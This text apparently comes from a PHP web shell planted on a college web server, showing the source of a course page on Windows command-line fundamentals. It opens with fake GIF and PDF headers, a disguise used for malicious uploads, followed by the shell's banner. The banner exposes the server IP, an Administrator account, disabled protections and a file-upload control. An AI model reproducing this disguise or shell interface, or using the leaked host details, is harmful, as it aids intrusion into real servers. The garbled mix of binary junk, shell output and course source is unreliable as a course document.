GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/CST1861/ |
Upload File : |
<? // JimMartinson/CST1861/Assignment_01.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. $thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc'); $thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc'); $thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc'); $title = "Part I - Windows Command-Line Fundamentals"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc'); $thisFile=__FILE__; $thisLine=__LINE__; include('Login/authenticate.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; $thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc'); ?> <p> <fieldset class="pio"><legend>Lesson Instruction</legend><span class="normal"> <ol start="1" class="pio"> <li>Read the Introduction in <?=$textbook['Title1']?><?=$textbook['Edition1']?>.</li> <li>Read Chapter 1 <i>Overview of the Windows Command Line</i> in <?=$textbook['Title1']?><?=$textbook['Edition1']?>.</li> <li>Read Chapter 2 <i>Getting the Most from the Command Line</i> in <?=$textbook['Title1']?><?=$textbook['Edition1']?>.</li> <li>Read Chapter 3 <i>Command-Line Scripting Essentials</i> in <?=$textbook['Title1']?><?=$textbook['Edition1']?>.</li> </ol> </span></fieldset> <fieldset class="pio"><legend>Objectives</legend><span class="normal"> <ol class="obj pio" start="3"> <!--Chapter 1 3 --> <li>Describe the Windows Command Shell. (ch1)</li> <li>Configure command-line properties. (ch1)</li> <li>Use the command history. (ch1)</li> <!--Chapter 2 6 --> <li>Describe the command Path and command search. (ch2)</li> <li>Use redirection. (ch2)</li> <!--Chapter 3 8 --> <li>Define a command-line script. <ch3)</li> <li>Use command-line arguments. <ch3)</li> <li>Use Environmental Variables. <ch3)</li> <li>Use command-line mathmatical expressions. <ch3)</li> <li>Use command-line selection statements. <ch3)</li> <li>Use command-line iteration statements. <ch3)</li> <li>Use subroutines and procedures. <ch3)</li> </ol> </span></fieldset> <fieldset><legend>Evaluations</legend><span class="normal"> There are no formal evaluations for this lesson. None of the above work needs to be turned in to the Instructor. </span></fieldset> <fieldset><legend>Description</legend><span class="normal"> Begin an understanding of the Windows Command-Line. </span></fieldset> <? $thisFile=__FILE__; $thisLine=__LINE__; include('ReferencesResources.phpinc'); ?> <? $thisFile=__FILE__; $thisLine=__LINE__; include('JimMartinson/ContactInformation.phpinc'); ?> </p> <? $thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc'); $thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc'); ?>